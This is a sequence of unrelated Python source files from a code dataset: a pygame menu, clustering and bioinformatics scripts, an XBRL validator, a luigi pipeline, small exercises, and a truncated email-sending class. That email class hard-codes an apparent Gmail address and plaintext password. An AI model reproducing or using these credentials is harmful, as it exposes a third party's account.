string\n\n# Import helper functions.\n#from helpers import top_draggable_sprite_at_point, aspect_scale, draw_rects\n#from screen_helpers import quit_game, switch_to_screen, notify\n\n# Import sprites.\nfrom sprites.base_sprites import ImageSprite, ButtonSprite, InputBox, button_at_point, TextSprite\n\ndef quit_game(game_state):\n game_state.update({'quit': True})\n game_state.update({'screen_done': True})\n return game_state\n\ndef start_game(game_state):\n game_state.update({'active_screen': 'arena_screen'})\n game_state.update({'screen_done': True})\n return game_state\n\n\ndef main_menu_loop(game_state):\n \"\"\"The main menu screen loop.\n \"\"\"\n\n game_surface = game_state.get('game_surface')\n clock = game_state.get('clock')\n fps = game_state.get('fps')\n screen_size = game_state.get('screen_size')\n screen_width = screen_size[0]\n screen_height = screen_size[1]\n framecount = 1\n\n #toast_stack = game_state.get('toast_stack')\n logo_sprites = pygame.sprite.OrderedUpdates()\n logo = ImageSprite(\n screen_width*0.315,\n screen_height*0.15,\n os.getcwd() +\"/images/Tank.png\"\n )\n logo.rect.centerx = (screen_width/2)\n logo_sprites.add(logo)\n\n # company_name = game_state.get('company_name')\n # input_font = pygame.font.Font(\"ARCADECLASSIC.TTF\", 40)\n # input_width, input_height = 0.1* screen_width, 0.0625*screen_height\n\n # company_name_input = InputBox(\n # (0.5*screen_width) - (0.5*input_width),\n # 0.68*screen_height,\n # input_width + 10,\n # input_height + 10,\n # input_font,\n # (0, 0, 255),\n # (255, 255, 0),\n # center_x=0.5*screen_width,\n # text=company_name,\n # max_width=500\n # )\n # company_name_input.active = True\n\n # Main group of sprites to display.\n all_sprites = pygame.sprite.OrderedUpdates()\n all_sprites.add(\n ButtonSprite(\n (screen_width * 0.455),\n (screen_height * 0.8),\n 'Play!',\n start_game,\n []),\n ButtonSprite(\n (screen_width * 0.455),\n (screen_height * 0.9),\n 'Quit',\n quit_game,\n [],\n ),\n )\n\n # prompt = TextSprite((0.43*screen_width) , 0.62 *screen_height, 400, 30, \"Enter Company Name\", text_color=(255,255,255), arcade_font=True)\n # prompt.rect.centerx = (screen_width/2)\n # name_prompt = pygame.sprite.Group()\n # name_prompt.add(prompt)\n # this poo could be important!\n\n # Want to refactor this body into seperate functions.\n while not game_state.get('screen_done'):\n\n # Handle events.\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n quit_game(game_state)\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n b = button_at_point(all_sprites, event.pos)\n if b:\n game_state = b.on_click(game_state)\n\n # elif event.type == pygame.KEYDOWN:\n # if event.key == pygame.K_RETURN:\n # game_state.update({'company_name': company_name_input.text})\n # start_game(game_state)\n # else:\n # company_name_input.event_handle(event) #Input Box Class has inbuilt event handling function for key down events.\n\n # Update.\n all_sprites.update()\n #toast_stack.update()\n\n # Display.\n game_surface.fill((0, 0, 0))\n logo_sprites.draw(game_surface)\n all_sprites.draw(game_surface)\n\n\n pygame.display.update()\n\n clock.tick(fps)\n\n return game_state\n","sub_path":"main_menu_screen.py","file_name":"main_menu_screen.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"176066171","text":"up# Hierarchical Clusturing\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# importing the mall dataset with pandas\ndataset = pd.read_csv('/Users/quentin/Documents/AI/UDEMY_ML/Machine Learning A-Z Template Folder/Part 4 - Clustering/Section 25 - Hierarchical Clustering/Mall_Customers.csv')\nX = dataset.iloc[:, [3,4]].values\n\n# Using the dendrogram to find the optimal number of clusters\nimport scipy.cluster.hierarchy as sch\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\nplt.title('dendrogram')\nplt.xlabel('Customers')\nplt.ylabel('Euclidean Distances')\nplt.show()\n\n'''\nHere again, the good number of clusers is 5\n'''\n\n# Fitting hierarchical clustering to the mall dataset\nfrom sklearn.cluster import AgglomerativeClustering\nhc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward')\ny_hc = hc.fit_predict(X)\n\n# Visualising the clusters\n# Plotting the clustured dataset (using boollean tricks)\nplt.scatter(X[y_hc == 0,0], X[y_hc == 0,1], s = 100, c = 'red', label = 'Careful')\nplt.scatter(X[y_hc == 1,0], X[y_hc == 1,1], s = 100, c = 'blue', label = 'Standard')\nplt.scatter(X[y_hc == 2,0], X[y_hc == 2,1], s = 100, c = 'green', label = 'Target')\nplt.scatter(X[y_hc == 3,0], X[y_hc == 3,1], s = 100, c = 'cyan', label = 'Careless')\nplt.scatter(X[y_hc == 4,0], X[y_hc == 4,1], s = 100, c = 'magenta', label = 'Sensible')\nplt.title('clusters of clients')\nplt.ylabel('Spending Score')\nplt.xlabel('Annual Income')\nplt.legend()\nplt.show()\n\n\n\n","sub_path":"Machine Learning A-Z/Part 4 - Clustering/Section 25 - Hierarchical Clustering/SECTION_25_PART_4.py","file_name":"SECTION_25_PART_4.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"231690972","text":"# Copyright 2015 Altova GmbH\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n#\t http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n__copyright__ = 'Copyright 2015 Altova GmbH'\n__license__ = 'http://www.apache.org/licenses/LICENSE-2.0'\n\n# Validates all SEC filings in the given RSS feed\n#\n# Usage:\n# \traptorxmlxbrl script scripts/validate_filings.py feeds/xbrlrss-2015-04.xml\n\nimport altova_api.v2.xml as xml\nimport altova_api.v2.xsd as xsd\nimport altova_api.v2.xbrl as xbrl\nimport re,sys,os.path,time,concurrent.futures,urllib,glob,logging,argparse\n\ngsRootDir = os.sep.join(os.path.abspath(__file__).split(os.sep)[:-2])\ngsRootURL = 'file://'+urllib.request.pathname2url(gsRootDir)+'/'\n\ndef load_rss_schema():\n\trss_schema, log = xsd.Schema.create_from_url(urllib.parse.urljoin(gsRootURL,'xsd/rss.xsd'))\n\tif not rss_schema:\n\t\traise Exception('\\n'.join([error.text for error in log]))\n\treturn rss_schema\n\t\ndef load_rss_feed(url,schema):\n\trss_feed, log = xml.Instance.create_from_url(urllib.parse.urljoin(gsRootURL,url),schema=schema)\n\tif not rss_feed:\n\t\traise Exception('\\n'.join([error.text for error in log]))\n\treturn rss_feed\n\ndef child_as_str(elem,name):\n\tchild = elem.find_child_element((name,'http://www.sec.gov/Archives/edgar'))\n\tif child:\n\t\treturn str(child.schema_actual_value)\n\treturn None\n\ndef child_as_int(elem,name):\n\tchild = elem.find_child_element((name,'http://www.sec.gov/Archives/edgar'))\n\tif child:\n\t\treturn int(child.schema_actual_value)\n\treturn None\n\t\ndef parse_rss_feed(rss_feed,args):\n\tdir = 'filings/'+re.fullmatch(r'file:///.*/xbrlrss-(\\d{4}-\\d{2})\\.xml',rss_feed.uri).group(1)\n\n\tfilings = []\n\trss = rss_feed.document_element\n\tfor channel in rss.element_children():\n\t\tfor item in channel.element_children():\n\t\t\tif item.local_name == 'item':\n\t\t\t\txbrlFiling = item.find_child_element(('xbrlFiling','http://www.sec.gov/Archives/edgar'))\n\t\t\t\tif xbrlFiling:\n\t\t\t\t\tif args.company_re and not bool(args.company_re.match(child_as_str(xbrlFiling,'companyName'))):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif args.form_type and args.form_type != child_as_str(xbrlFiling,'formType'):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif args.cik and args.cik != child_as_int(xbrlFiling,'cikNumber'):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif args.sic and args.sic != child_as_int(xbrlFiling,'assignedSic'):\n\t\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\t\taccessionNumber = xbrlFiling.find_child_element(('accessionNumber','http://www.sec.gov/Archives/edgar')).schema_normalized_value\n\t\t\t\t\txbrlFiles = xbrlFiling.find_child_element(('xbrlFiles','http://www.sec.gov/Archives/edgar'))\n\t\t\t\t\tfor xbrlFile in xbrlFiles.element_children():\n\t\t\t\t\t\tif xbrlFile.find_attribute(('type','http://www.sec.gov/Archives/edgar')).schema_normalized_value == 'EX-101.INS':\n\t\t\t\t\t\t\turl = xbrlFile.find_attribute(('url','http://www.sec.gov/Archives/edgar')).schema_normalized_value\n\t\t\t\t\t\t\tfilings.append(dir+'/'+accessionNumber+'-xbrl.zip%7Czip/'+url.split('/')[-1])\n\treturn filings\n\ndef validate(url):\n\tinstance, log = xbrl.Instance.create_from_url(urllib.parse.urljoin(gsRootURL,url))\n\tif not instance or log.has_errors():\t\t\n\t\terrors = list(log.errors)\n\t\tlogger.error('Filing %s has %d ERRORS!',url,len(errors))\n\t\tif logging.getLogger().isEnabledFor(logging.DEBUG):\n\t\t\tlogger.log(logging.DEBUG,'\\n'.join([error.text for error in log]))\n\t\treturn False\n\tif log.has_inconsistencies():\n\t\tinconsistencies = list(log.inconsistencies)\n\t\tlogger.warning('Filing %s has %d INCONSISTENCIES!',url,len(inconsistencies))\n\t\tif logging.getLogger().isEnabledFor(logging.DEBUG):\n\t\t\tlogger.log(logging.DEBUG,'\\n'.join([error.text for error in inconsistencies]))\n\telse:\n\t\tlogger.info('Filing %s is VALID!',url)\n\treturn True\n\t\ndef parse_args():\n\t\"\"\"Returns the arguments and options passed to the script.\"\"\"\n\tparser = argparse.ArgumentParser(description='Validates all filings contained in the given EDGAR RSS feed from the SEC archive.')\n\tparser.add_argument('rss_feeds', metavar='RSS', nargs='+', help='EDGAR RSS feed file')\n\tparser.add_argument('--log', metavar='LOGFILE', dest='log_file', help='specify output log file')\n\tparser.add_argument('--log-level', type=int, default=logging.INFO, help='specify min. log level (use 10 to enable detailed error messages)')\n\tparser.add_argument('--cik', help='CIK number')\n\tparser.add_argument('--sic', help='SIC number')\n\tparser.add_argument('--form-type', help='Form type (10-K,10-Q,...)')\n\tparser.add_argument('--company', help='Company name')\n\tparser.add_argument('--threads', type=int, default=8, dest='max_threads', help='specify max number of threads')\n\targs = parser.parse_args()\n\targs.company_re = re.compile(args.company, re.I) if args.company else None\n\tif args.cik:\n\t\targs.cik = int(args.cik)\n\tif args.sic:\n\t\targs.sic = int(args.sic)\n\treturn args\n\t\ndef setup_logging(args):\n\t\"\"\"Setup the Python logging infrastructure.\"\"\"\n\tglobal logger\n\tif args.log_file:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',filename=args.log_file,filemode='w',level=args.log_level)\n\telse:\n\t\tlogging.basicConfig(format='%(asctime)s %(levelname)s %(message)s',level=args.log_level)\n\tlogger = logging.getLogger('default')\n\t\ndef main():\n\t# Parse script arguments\n\targs = parse_args()\t\n\t# Setup python logging framework\n\tsetup_logging(args)\n\n\trss_schema = load_rss_schema()\n\tfor arg in sys.argv[1:]:\n\t\tfor file in glob.glob(arg):\n\t\t\tlogger.info('Loading rss file %s',file)\n\t\t\trss_feed = load_rss_feed(urllib.request.pathname2url(file),rss_schema)\n\t\t\tfilings = parse_rss_feed(rss_feed,args)\n\t\t\t\n\t\t\tlogger.info('Processing %d filings...',len(filings))\n\t\t\twith concurrent.futures.ThreadPoolExecutor(max_workers=args.max_threads) as executor:\n\t\t\t\tfutures = [executor.submit(validate,url) for url in filings]\n\t\t\t\tfor future in concurrent.futures.as_completed(futures):\n\t\t\t\t\tfuture.result()\n\nif __name__ == '__main__':\n\tstart = time.clock()\n\tmain()\n\tend = time.clock()\n\tprint('Finished in ',end-start)","sub_path":"scripts/validate_filings.py","file_name":"validate_filings.py","file_ext":"py","file_size_in_byte":6266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"198353090","text":"\"\"\"\nscript to create phenotype comparison tables for genome protein expression profiles, and metadata files accompaniying them.\nThese tables will be used as inputs for the DESeq package in R for differential genome analysis and extracting meaningfull\ndifferentially expressed genomes from samples.\n\"\"\"\n\nimport pandas as pd\nimport json\nimport os\n\nphenotype_pairs_f = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/comparisonLists.txt'\nsamplesSubsamples2phenotypes_dic_f = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/samplesSubSamples2phenotypes_dic.json'\nallBin2taxon_dic_f = '/data/mstambou/proteome_landscapes/auxilary/allBin2taxon_dic.json'\n\nsamples_summary_f = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/samples_1_genomes_1000_peps_withPhenotypes.tsv'\ngenome_abundance_dir = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/genome_spectralCount/'\n\nout_dir = '/data/mstambou/proteome_landscapes/highly_abundant_genomes/phenotype_taxa_relNorm_profiles_scaled/'\n\ntax_level = 's'\n\n\nif not os.path.isdir(out_dir):\n os.mkdir(out_dir)\n\nwith open(samplesSubsamples2phenotypes_dic_f, 'r') as in_f:\n samplesSubsamples2phenotypes_dic = json.load(in_f)\n \nsamples_summary_df = pd.read_csv(samples_summary_f, sep = '\\t')\n\nwith open(allBin2taxon_dic_f, 'r') as in_f:\n allBin2taxon_dic = json.load(in_f)\n\ndef getMST(genome, allBin2taxon_dic = allBin2taxon_dic, l = tax_level):\n if allBin2taxon_dic[genome][l] != '':\n return l + '__' + allBin2taxon_dic[genome][l]\n else:\n for c in 'sgfocpd':\n taxon = allBin2taxon_dic[genome][c]\n if taxon != '' and taxon != 'GCF_' and taxon != 'GCA_':\n return c+'__'+taxon\n\nscale = 1000\n\nwith open(phenotype_pairs_f, 'r') as in_f:\n for line in in_f:\n line = line.strip().split('\\t')\n phen1, phen2 = line[0], line[1]\n print(f'processing {phen1} vs {phen2} ...')\n phen1_samples = samplesSubsamples2phenotypes_dic[phen1]\n phen1_df = samples_summary_df[samples_summary_df['sample_name'].isin(phen1_samples)]\n pair_genomes = [item for sublist in list(phen1_df['expanded_genomes']) for item in sublist.split('|')]\n phen2_samples = samplesSubsamples2phenotypes_dic[phen2]\n phen2_df = samples_summary_df[samples_summary_df['sample_name'].isin(phen2_samples)]\n pair_genomes.extend([item for sublist in list(phen2_df['expanded_genomes']) for item in sublist.split('|')])\n \n pair_genomes = list(set(pair_genomes))\n pair_taxa = list(set([getMST(genome) for genome in pair_genomes]))\n \n taxa2idx_dic = {taxa:i for i, taxa in enumerate(pair_taxa)}\n pair_df = pd.DataFrame()\n pair_df['taxa'] = pair_taxa\n pair_metadata_df = pd.DataFrame(columns = ['sample_ID', 'phenotype'])\n \n for sample in phen1_samples:\n sample_df = pd.read_csv(f'{genome_abundance_dir + sample}_genome2NspectraNormalized.tsv', sep = '\\t')\n sample_vec = [1]*len(pair_taxa)\n pair_metadata_df.loc[len(pair_metadata_df)] = [sample, phen1]\n for i, row in sample_df.iterrows():\n genome_id, n_spectra = row['genome'], row['rel_n_spectra_%_normalized']\n taxa_id = getMST(genome_id)\n n_spectra = int(round(n_spectra*scale))\n sample_vec[taxa2idx_dic[taxa_id]] = n_spectra \n pair_df[sample] = sample_vec\n \n for sample in phen2_samples:\n sample_df = pd.read_csv(f'{genome_abundance_dir + sample}_genome2NspectraNormalized.tsv', sep = '\\t')\n sample_vec = [1]*len(pair_taxa)\n pair_metadata_df.loc[len(pair_metadata_df)] = [sample, phen2]\n for i, row in sample_df.iterrows():\n genome_id, n_spectra = row['genome'], row['rel_n_spectra_%_normalized']\n taxa_id = getMST(genome_id)\n n_spectra = int(round(n_spectra*scale))\n sample_vec[taxa2idx_dic[taxa_id]] = n_spectra \n pair_df[sample] = sample_vec\n \n pair_df.to_csv(out_dir + phen1 + '_vs_' + phen2 + f'_{tax_level}_taxaProfiles.tsv', sep = '\\t', index = False)\n pair_metadata_df.to_csv(out_dir + phen1 + '_vs_' + phen2 + '_metadata.tsv', sep = '\\t', index = False)\n \n","sub_path":"proteinAbundance/get_relNormScaled_taxProfileTables.py","file_name":"get_relNormScaled_taxProfileTables.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"597492205","text":"\ndef secondMax(max1, max2):\n if max2 > max1:\n max1, max2 = max2, max1\n while True:\n cislo = int(input())\n if cislo == -1:\n break\n elif cislo > max1:\n max2 = max1\n max1 = cislo\n elif max2 < cislo < max1:\n max2 = cislo\n return max2\n\na = int(input())\nb = int(input())\n\nresult = secondMax(a, b)\nprint(result)\n\n","sub_path":"secondmax.py","file_name":"secondmax.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"227553530","text":"from pathlib import Path\n\nfrom pytest import fixture\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import make_scorer, mean_squared_error, r2_score\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import RobustScaler\n\nfrom coltrane import Batch\nfrom coltrane.file.io.csv.single import Data\nfrom coltrane.regression import Inspector, Processor\n\n__LOG = Path('log')\n__DATA_HOUSING = Path('coltrane/test/data/housing.csv')\n\n__RANDOM_STATE = 45625461\n\n\n@fixture(scope='function')\ndef data() -> Data:\n return Data(path=__DATA_HOUSING)\n\n\n@fixture(scope='function')\ndef batch(data: Data, random_state: int) -> Batch:\n\n return Batch(\n data,\n pipeline=Pipeline(\n steps=[\n ('robust-scaler', RobustScaler()),\n ('linear', LinearRegression())\n ]\n ),\n selection=RepeatedKFold(\n n_splits=5,\n n_repeats=1,\n random_state=__RANDOM_STATE\n ),\n scorers={\n 'r2': make_scorer(r2_score),\n 'mse': make_scorer(mean_squared_error)\n }\n )\n\n\ndef test_inspection(data: Data):\n inspector = Inspector()\n inspector.inspect(data, output=__LOG)\n\n\ndef test_regression(batch: Batch):\n processor = Processor()\n processor.process(batch, output=__LOG)\n","sub_path":"coltrane/test/test_housing.py","file_name":"test_housing.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"646358674","text":"\nperm_dic= {\n #'crm_table_index': ['table_index', 'GET', [], {'source':'qq'}, ], # 可以查看audit APP里所有数据库表\n 'audit_table_list': ['table_detail', 'GET', [], {}], # 可以查看每张表里所有的数据\n 'audit_table_list_view': ['table_change', 'GET', [], {}], # 可以访问表里每条数据的修改页\n 'audit_table_list_change': ['table_change', 'POST', [], {}], # 可以对表里的每条数据进行修改\n 'audit_table_obj_add_view': ['table_add', 'GET', [], {}], # 可以访问数据增加页\n 'audit_table_obj_add': ['table_add', 'POST', [], {}], # 可以创建表里的数据\n\n}\n\n\n\n","sub_path":"hotel/permission_list.py","file_name":"permission_list.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"577894740","text":"#!/usr/bin/env python3\n\n\"\"\"Problem 102: Triangle containment\"\"\"\n\nfrom utils import get_path\n\n\ndef main():\n cnt = 0\n\n with get_path(\"data\", \"triangles.txt\").open() as data_file:\n for line in data_file:\n x1, y1, x2, y2, x3, y3 = map(int, line.split(\",\"))\n\n # if z-components of cross products OA x OB, OB x OC, OC x OA are\n # all of the same sign, the origin is within the triangle.\n\n if (x1*y2 - y1*x2 > 0) is (x2*y3 - y2*x3 > 0) is (x3*y1 - y3*x1 > 0):\n cnt += 1\n return cnt\n\n\nif __name__ == \"__main__\":\n print(main())\n","sub_path":"python/p102.py","file_name":"p102.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"557286826","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# pylint: disable=no-member\n# core\nfrom datetime import datetime\nimport hashlib\nimport logging\nimport json\nfrom pathlib import Path\nimport shutil\nimport subprocess\nimport time\n\n# pip\nimport requests # noqa\nimport luigi # noqa\nfrom luigi.util import requires # noqa\n\n# local\nimport bio3dbeacon\nfrom .database import get_db\nfrom .database.models import ModelStructure\nfrom .qmean import QmeanRunner\n\nLOG = logging.getLogger(__name__)\n\n# this is used to generate the UID for all entries\n# if you change this then all database entries need\n# to be recalculated (which might be what you want)\nDATA_MODEL_VERSION = '1'\n\n\ndef get_uid_from_file(model_file):\n \"\"\"\n Generates a unique id (MD5) based on the file contents (and `DATA_MODEL_VERSION`)\n \"\"\"\n model_path = Path(model_file).resolve()\n model_contents = open(model_path, 'r').read()\n m = hashlib.sha256()\n m.update(model_contents.encode('utf-8'))\n m.update(DATA_MODEL_VERSION.encode('utf-8'))\n uid = m.hexdigest()\n return uid\n\n\ndef get_file_path(*, basedir, uid, suffix):\n \"\"\"\n Generates a standardised internal file path\n \"\"\"\n uid = str(uid)\n return Path(basedir) / uid[:2] / str(uid + suffix)\n\n\nclass WithAppMixin:\n\n @property\n def app(self):\n if not hasattr(self, '_app'):\n LOG.debug(\"Creating app for luigi task %s ...\",\n self.__class__.__name__)\n self._app = bio3dbeacon.app.create_app()\n return self._app\n\n\nclass BaseTask(WithAppMixin, luigi.Task):\n \"\"\"\n Base class for all Luigi tasks\n \"\"\"\n\n\nclass BaseWrapperTask(WithAppMixin, luigi.WrapperTask):\n \"\"\"\n Base class for all Luigi Wrapper tasks\n \"\"\"\n\n\nclass IngestModelPdb(BaseTask):\n \"\"\"\n Makes sure we have a PDB file for the model structure\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n\n Output:\n /path/to/model.pdb\n\n \"\"\"\n\n pdb_file = luigi.Parameter()\n uid = luigi.Parameter()\n\n def output(self):\n uid = str(self.uid)\n outfile = get_file_path(\n basedir=self.app.config['WORK_DIR'], uid=uid, suffix='.pdb')\n target = luigi.LocalTarget(outfile)\n target.makedirs()\n return target\n\n def run(self):\n\n uid = str(self.uid)\n pdb_path = Path(self.pdb_file).resolve()\n app = self.app\n\n with app.app_context():\n entry = ModelStructure.query.filter(uid=uid).one()\n\n dt_now = datetime.utcnow()\n if not entry:\n msg = f\"failed to find entry with id '{uid}' in database\"\n raise ValueError(msg)\n\n entry.update({\n 'updated_at': dt_now,\n 'original_path': str(pdb_path),\n })\n shutil.copyfile(pdb_path, self.output().path)\n db = get_db()\n LOG.info(\"Adding PDB entry %s to DB %s\", entry, db)\n db.session.add(entry)\n db.session.commit()\n\n\n@requires(IngestModelPdb)\nclass CalculateQmean(BaseTask):\n \"\"\"\n Calculates the QMEAN score for the given PDB file\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n run_remotely: whether to run via API or local docker (default: False)\n\n Input: \n model.pdb\n\n Output: \n model_qmean.json\n\n \"\"\"\n\n run_remotely = luigi.BoolParameter(default=True)\n\n def output(self):\n pdb_file = self.input()\n if not pdb_file.path.endswith('.pdb'):\n raise ValueError(\n f\"expected pdb_file '{pdb_file}' to end with '.pdb'\")\n json_file = pdb_file.path.replace('.pdb', '_qmean.json')\n return luigi.LocalTarget(json_file)\n\n def run(self):\n\n app = self.app\n uid = str(self.uid)\n pdb_file = Path(self.pdb_file).resolve()\n qmean_output_file = self.output()\n\n runner = QmeanRunner(app=app, pdb_file=pdb_file)\n\n if self.run_remotely:\n results = runner.run_remote()\n else:\n results = runner.run_local()\n\n dt_now = datetime.utcnow()\n\n with app.app_context():\n db = get_db()\n\n entry = ModelStructure.query.get(uid)\n if not entry:\n raise ValueError(\n f\"failed to find model_structure '{uid}' in database\")\n\n entry.updated_at = dt_now\n entry.qmean_created_at = dt_now\n db.session.add(entry)\n\n LOG.info(\"Writing output JSON score data to: '%s'\",\n qmean_output_file)\n\n with qmean_output_file.open('w') as fp:\n json.dump(results, fp, indent=2, sort_keys=True)\n\n LOG.info(\"Committing changes\")\n\n db.session.commit()\n\n\n@requires(IngestModelPdb)\nclass ConvertPdbToMmcif(BaseTask):\n \"\"\"\n Converts model PDB to mmCIF file\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n\n Input:\n model.pdb\n\n Output:\n model.mmcif\n \"\"\"\n\n def output(self):\n pdb_file = self.input()\n if not pdb_file.path.endswith('.pdb'):\n raise ValueError(\n f\"expected pdb_file '{pdb_file}' to end with '.pdb'\")\n mmcif_file = pdb_file.path.replace('.pdb', '.mmcif')\n return luigi.LocalTarget(mmcif_file)\n\n def run(self):\n pdb_file = self.input()\n mmcif_atomic_file = self.output()\n with mmcif_atomic_file.temporary_path() as temp_output_path:\n LOG.info(\"convert PDB to mmCIF: %s -> %s\",\n pdb_file.path, temp_output_path)\n self.convert_pdb_to_mmcif(pdb_file.path, temp_output_path)\n LOG.info(\"updating DB\")\n self.update_db()\n LOG.info(\"done\")\n\n def convert_pdb_to_mmcif(self, pdb_path, mmcif_path):\n \"\"\"Converts PDB to mmCIF file\"\"\"\n\n # gemmi_exe = self.app.config['GEMMI_EXE']\n # cmd_args = ['', 'convert', '--to', 'mmcif', pdb_path, mmcif_path]\n\n cmd_args = ['pdb_tocif', pdb_path]\n try:\n with open(mmcif_path, \"wt\") as outfile:\n subprocess.run(cmd_args, check=True, encoding='utf-8',\n stderr=subprocess.PIPE, stdout=outfile)\n except subprocess.CalledProcessError as err:\n LOG.error(\"failed to convert pdb to mmcif: %s\", err)\n LOG.error(\"CMD: %s\", \" \".join(cmd_args))\n LOG.error(\"ERROR: %s\", err)\n LOG.error(\"STDERR: %s\", err.stderr)\n LOG.error(\"STDOUT: %s\", err.stdout)\n raise\n\n def update_db(self):\n \"\"\"Updates the database\"\"\"\n app = self.app\n\n dt_now = datetime.utcnow()\n with app.app_context():\n db = get_db()\n entry = ModelStructure.query.get(self.uid)\n if not entry:\n raise ValueError(\n f\"failed to find model_structure '{self.uid}' in database\")\n\n entry.updated_at = dt_now\n entry.mmcif_created_at = dt_now\n db.session.add(entry)\n\n LOG.info(\"Moving mmCIF file to: '%s'\", self.output())\n db.session.commit()\n\n\n@requires(ConvertPdbToMmcif)\nclass ConvertMmcifToBcif(BaseTask):\n \"\"\"\n Convert mmCIF file to bCIF (molstar)\n\n Params:\n pdb_file: PDB file\n uid: unique ID\n\n Input:\n model.mmcif\n\n Output:\n model.bcif\n \"\"\"\n\n def output(self):\n mmcif_file = self.input()\n if not mmcif_file.path.endswith('.mmcif'):\n raise ValueError(\n f\"expected mmcif file '{mmcif_file}' to end with '.mmcif'\")\n bcif_file = mmcif_file.path.replace('.mmcif', '.bcif')\n return luigi.LocalTarget(bcif_file)\n\n def run(self):\n mmcif_file = self.input()\n bcif_file = self.output()\n molstar_exe = self.app.config['MOLSTAR_PREPROCESS_EXE']\n cmd_args = ['node', str(molstar_exe),\n '-i', str(mmcif_file.path),\n '-ob', str(bcif_file.path)]\n try:\n subprocess.run(cmd_args, check=True, encoding='utf-8',\n stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n except subprocess.CalledProcessError as err:\n LOG.error(\"failed to convert mmcif to bcif: %s\", err)\n LOG.error(\"CMD: %s\", \" \".join(cmd_args))\n LOG.error(\"ERROR: %s\", err)\n LOG.error(\"STDERR: %s\", err.stderr)\n LOG.error(\"STDOUT: %s\", err.stdout)\n raise\n\n\nclass ProcessModelPdb(BaseWrapperTask):\n \"\"\"\n Generate all related files for a given model PDB file\n\n Params:\n pdb_file: input PDB file\n \"\"\"\n\n pdb_file = luigi.Parameter()\n\n def requires(self):\n uid = str(self.uid)\n pdb_file = self.pdb_file\n uid = self.get_uid()\n LOG.info(\"ProcessModelPdb: calculate qmean (local)\")\n yield(CalculateQmean(pdb_file=pdb_file, uid=uid))\n LOG.info(\"ProcessModelPdb: convert pdb to mmcif\")\n yield(ConvertPdbToMmcif(pdb_file=pdb_file, uid=uid))\n # LOG.info(\"ProcessModelPdb: add mmcif to molstar\")\n # yield(ConvertMmcifToBcif(pdb_file=pdb_file, uid=uid))\n\n def get_uid(self):\n if not hasattr(self, '_uid'):\n self._uid = None\n\n if self._uid is None:\n self._uid = get_uid_from_file(self.pdb_file)\n\n return self._uid\n","sub_path":"bio3dbeacon/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":9349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"568113218","text":"\r\nimport sys\r\nimport ast\r\nfrom datetime import datetime\r\n \r\nimport smtplib\r\nimport mimetypes\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email import encoders\r\nfrom email.message import Message\r\nfrom email.mime.audio import MIMEAudio\r\nfrom email.mime.base import MIMEBase\r\nfrom email.mime.image import MIMEImage\r\nfrom email.mime.text import MIMEText\r\n \r\n \r\n \r\nclass Bimail:\r\n\tdef __init__(self,subject,recipients):\r\n\t\tself.subject = subject\r\n\t\tself.recipients = recipients\r\n\t\tself.htmlbody = ''\r\n\t\tself.sender = \"barbxsingh@gmail.com\"\r\n\t\tself.senderpass = 'mymail23account'\r\n\t\tself.attachments = []\r\n \r\n\tdef send(self):\r\n\t\tmsg = MIMEMultipart('alternative')\r\n\t\tmsg['From']=self.sender\r\n\t\tmsg['Subject']=self.subject\r\n\t\tmsg['To'] = \", \".join(self.recipients) # to must be array of the form ['mailsender135@gmail.com']\r\n\t\tmsg.preamble = \"preamble goes here\"\r\n\t\t#check if there are attachments if yes, add them\r\n\t\tif self.attachments:\r\n\t\t\tself.attach(msg)\r\n\t\t#add html body after attachments\r\n\t\tmsg.attach(MIMEText(self.htmlbody, 'html'))\r\n\t\t#send\r\n\t\ts = 